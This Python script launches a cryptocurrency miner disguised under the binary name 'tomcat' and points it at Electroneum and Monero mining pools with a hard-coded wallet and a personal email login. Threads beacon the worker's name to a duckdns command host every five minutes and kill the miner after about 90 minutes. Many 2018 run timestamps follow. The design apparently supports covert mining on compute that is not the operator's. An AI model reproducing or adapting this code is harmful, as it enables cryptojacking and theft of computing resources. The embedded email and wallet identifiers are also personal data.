import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:14:03.384069
#2018-02-17 16:01:04.722023
#2018-02-17 17:49:05.500661
#2018-02-17 19:36:06.960656
#2018-02-17 21:24:04.817871
#2018-02-17 23:08:05.069275
#2018-02-18 00:55:01.536329
#2018-02-18 02:43:01.588190
#2018-02-18 04:32:05.997648
#2018-02-18 06:23:06.834743
#2018-02-18 08:12:04.318790
#2018-02-18 09:59:06.414809
#2018-02-18 11:46:04.515108
#2018-02-18 13:29:07.380976
#2018-02-18 15:19:06.146036
#2018-02-18 17:08:01.626463
#2018-02-18 18:54:07.635340
#2018-02-18 20:42:03.577270
#2018-02-18 22:27:03.192341
#2018-02-19 00:16:03.927373
#2018-02-19 02:02:05.227332
#2018-02-19 03:48:05.596546
#2018-02-19 05:32:04.713511
#2018-02-19 07:20:04.479140
#2018-02-19 09:09:01.932665
#2018-02-19 10:58:07.270463
#2018-02-19 12:47:04.106669
#2018-02-19 14:37:01.598992
#2018-02-19 16:24:09.548724
#2018-02-19 18:11:01.641965
#2018-02-19 19:57:05.787265
#2018-02-19 21:44:07.306964
#2018-02-19 23:31:07.691774
#2018-02-20 01:17:03.849540
#2018-02-20 03:07:05.942773
#2018-02-20 04:54:07.204961
#2018-02-20 06:37:02.124687
#2018-02-20 08:22:01.475957
#2018-02-20 10:07:06.666301
#2018-02-20 11:51:09.736418
#2018-02-20 13:39:08.141634
#2018-02-20 15:22:04.542490
#2018-02-20 17:08:05.105588
#2018-02-20 18:56:05.257267
#2018-02-20 20:46:08.424822
#2018-02-20 22:32:08.051726
#2018-02-21 00:13:07.469586
#2018-02-21 01:59:05.098976
#2018-02-21 03:47:06.329710
#2018-02-21 05:31:04.276107
#2018-02-21 07:19:04.995327
#2018-02-21 09:04:05.083828
#2018-02-21 10:52:06.220348
#2018-02-21 12:38:06.170096
#2018-02-21 14:24:06.815609
#2018-02-21 16:11:12.408453
#2018-02-21 18:02:06.830049
#2018-02-21 19:49:07.403857
#2018-02-21 21:36:05.380562
#2018-02-21 23:22:06.729663
#2018-02-22 01:11:08.004555
#2018-02-22 03:01:03.993671
#2018-02-22 04:47:01.293938
#2018-02-22 06:31:07.190600
#2018-02-22 08:18:06.554283
#2018-02-22 10:06:07.234052
#2018-02-22 11:51:08.184132
#2018-02-22 13:36:07.050076
#2018-02-22 15:24:04.450282
#2018-02-22 17:11:09.988890
#2018-02-22 18:57:05.244331
#2018-02-22 20:48:06.625081
#2018-02-22 22:33:03.691250
#2018-02-23 00:19:06.791012
#2018-02-23 02:08:08.032935
#2018-02-23 03:58:03.668388
#2018-02-23 05:45:04.278001
#2018-02-23 07:36:02.209097
#2018-02-23 09:38:08.280399
#2018-02-23 11:42:08.654804
#2018-02-23 13:33:06.529830
#2018-02-23 15:18:01.990650
#2018-02-23 17:06:04.382118
#2018-02-23 18:54:06.274649
#2018-02-23 20:40:01.518121
#2018-02-23 22:26:01.319553
#2018-02-24 00:12:06.282139
#2018-02-24 02:05:05.686260
#2018-02-24 03:55:06.329732
#2018-02-24 05:41:04.632333
#2018-02-24 07:32:04.336277
#2018-02-24 09:18:05.761417
#2018-02-24 11:05:06.949087
#2018-02-24 12:53:04.790474
#2018-02-24 14:41:04.370782
#2018-02-24 16:32:07.144141
#2018-02-24 18:23:07.005886
#2018-02-24 20:10:01.468567
#2018-02-24 21:54:05.194772
#2018-02-25 00:54:07.477993
#2018-02-25 04:47:07.242607
#2018-02-25 09:07:01.699630